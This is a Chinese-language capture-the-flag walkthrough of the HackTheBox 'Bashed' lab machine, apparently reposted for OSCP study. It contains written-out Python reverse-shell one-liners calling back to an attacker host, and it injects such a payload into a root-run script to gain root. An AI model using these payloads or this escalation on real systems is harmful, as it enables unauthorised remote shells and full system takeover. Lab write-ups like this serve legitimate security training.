渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

admin 2022年11月15日12:05:45安全文章评论9 views1586字阅读5分17秒阅读模式

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

靶机信息

靶机地址:

 https://app.hackthebox.com/machines/Bashed

靶场: HackTheBox.com

靶机名称:Bashed

难度: 简单

提示信息:

 

目标: user.txt和root.txt

实验环境

 攻击机:Kali 10.10.16.4
 
 靶机:10.10.10.68

信息收集

扫描端口

扫描靶机开放的服务端口

 sudo nmap -p- 10.10.10.68

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

 sudo nmap -sC -sV -A -p80 10.10.10.68 -oN nmap.log

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

扫描后发现只开放了80端口,先访问看看

 http://10.10.10.68/

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

访问后发现程序中有phpbash说明,看来这个站点跟phpbash有关,试试这几个目录下面有没能phpbash.php文件

 curl http://10.10.10.68/uploads/phpbash.php
 curl http://10.10.10.68/dev/phpbash.php

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

漏洞利用(Exploitation)

dev目录下发现phpbash.php,用浏览器来访问

 http://10.10.10.68/dev/phpbash.php

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

访问成功,来找找敏感信息

sudo -l

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

执行sudo -l后发现允许使用scriptmanager权限执行任何命令不需要密码,反弹个shell把scriptmanager权限发到攻击机上

1。攻击机监听4444端口

nc -lvnp 4444

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

2。执行反弹payload

sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

拿到scriptmanager用户权限,再来找找敏感信息

cd /home/arrexel
cat user.txt

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

在arrexel用户目录下发现user.txt,再找找可提权的信息

cd 
ls -al

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

权限提升(Privilege Escalation)

根目录下发现scripts文件夹,进入文件夹后发现test.py脚本和test.txt文本文件,看日期文件是刚刚生成的,先来看看test.py脚本内容

cat test.py

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

脚本内容为打开test.txt文件,写入内容,关闭文件,看test.txt文件权限为root,说明后台是root权限在运行test.py脚本

在脚本中插入反弹shell,当脚本以root权限运行时就会反弹个root权限的shell到攻击机上。

1。攻击机监听3333端口

nc -lvvp 3333

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

2。脚本中插入反弹payload

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.5",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' >>test.py

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

脚本写入后几秒钟shell便反弹回来,现在拿到了root权限,来找第2个flag。

cat /root/root.txt

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

拿到root.txt,游戏结束

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月15日12:05:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  渗透测试靶机练习No.145 HTB:Bashed(OSCP Prep) http://cn-sec.com/archives/1410316.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: